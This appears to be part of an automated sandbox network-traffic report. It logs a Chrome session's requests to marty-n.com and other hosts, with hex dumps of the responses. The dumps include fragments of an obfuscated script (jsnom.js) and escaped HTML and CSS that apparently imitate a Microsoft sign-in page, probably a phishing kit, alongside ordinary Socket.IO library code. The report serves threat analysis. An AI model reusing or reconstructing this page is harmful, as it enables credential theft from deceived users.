                                                                                                              2024-10-25 20:23:33 UTC8000INData Raw: 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78
                                                                                                              Data Ascii: 20\x0a\x20\x20\x20\x20.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x
                                                                                                              2024-10-25 20:23:33 UTC8000INData Raw: 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c
                                                                                                              Data Ascii: 20ease-in-out;\x0a\x20\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x20-12px;\
                                                                                                              2024-10-25 20:23:33 UTC8000INData Raw: 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32
                                                                                                              Data Ascii: x20.checkbox-wrapper-43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x2
                                                                                                              2024-10-25 20:23:33 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                                                              Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
                                                                                                              2024-10-25 20:23:33 UTC8000INData Raw: 72 65 73 65 6e 74 61 74 69 6f 6e 5c 78 32 32 5c 78 32 30 70 6e 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32
                                                                                                              Data Ascii: resentation\x22\x20pngsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22
                                                                                                              2024-10-25 20:23:34 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                                                                              Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20
                                                                                                              2024-10-25 20:23:34 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                                                              Data Ascii: \x20\x20...\x20<input\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x20\x20\x20\x20\x


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              27192.168.2.164973918.245.31.784431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:34 UTC556OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                                                              Host: cdn.socket.io
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              Origin: https://marty-n.com
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: script
                                                                                                              Referer: https://marty-n.com/
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:34 UTC702INHTTP/1.1 200 OK
                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                              Content-Length: 49993
                                                                                                              Connection: close
                                                                                                              Accept-Ranges: bytes
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                                              Content-Disposition: inline; filename="socket.io.min.js"
                                                                                                              Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                                                                              ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                                                              Server: Vercel
                                                                                                              Strict-Transport-Security: max-age=63072000
                                                                                                              X-Vercel-Cache: HIT
                                                                                                              X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                                                                              X-Cache: Hit from cloudfront
                                                                                                              Via: 1.1 1eee8db55908814c8f0cde754e3bee5a.cloudfront.net (CloudFront)
                                                                                                              X-Amz-Cf-Pop: FRA56-P8
                                                                                                              X-Amz-Cf-Id: s0nBAvTOnbSFz8j_fNjAsKT7B9Ql9WjLq9OpsB_YnLxS0fAzM9dKpg==
                                                                                                              Age: 7595205
                                                                                                              2024-10-25 20:23:34 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                                                              Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                                                              2024-10-25 20:23:34 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                                                                              Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                                                                                              2024-10-25 20:23:34 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                                                                                              Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                                                                                              2024-10-25 20:23:34 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                                                                                                              Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              28192.168.2.164972920.236.24.53443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:34 UTC493OUTGET /apc/trans.gif?22db3acaefe0c8e5f7f11c615870399b HTTP/1.1
                                                                                                              Origin: https://www.bing.com
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: mwh06prdapp02-canary-opaph.netmon.azure.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-10-25 20:23:35 UTC571INHTTP/1.1 200 OK
                                                                                                              Content-Type: image/gif
                                                                                                              Last-Modified: Tue, 17 Sep 2024 21:36:08 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "3ea699b499db1:0"
                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: X-UserHostAddress, X-EndPoint, X-FrontEnd, X-MachineName
                                                                                                              X-EndPoint: mwh06prdapp02
                                                                                                              X-MachineName: mwh06app021
                                                                                                              X-UserHostAddress: 173.254.250.0
                                                                                                              X-Powered-By: ASP.NET
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                              Date: Fri, 25 Oct 2024 20:23:34 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 43
                                                                                                              2024-10-25 20:23:35 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              29192.168.2.1649740185.45.66.1554431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC345OUTGET /o/jsnom.js HTTP/1.1
                                                                                                              Host: marty-n.com
                                                                                                              Connection: keep-alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:35 UTC284INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:35 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 30 Sep 2024 10:56:37 GMT
                                                                                                              ETag: "73b0b0c-1877d-623540f1918c2"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 100221
                                                                                                              Content-Type: application/javascript
                                                                                                              2024-10-25 20:23:35 UTC7908INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                                                                              Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                                                                              2024-10-25 20:23:35 UTC8000INData Raw: 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                                                              Data Ascii: te;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20\x20\x20\x20\x2
                                                                                                              2024-10-25 20:23:35 UTC8000INData Raw: 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c 78 32 30 72 67 62 28 35 39 2c 5c 78 32 30 35
                                                                                                              Data Ascii: ing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\x20rgb(59,\x205
                                                                                                              2024-10-25 20:23:35 UTC8000INData Raw: 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78
                                                                                                              Data Ascii: 20\x0a\x20\x20\x20\x20.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x
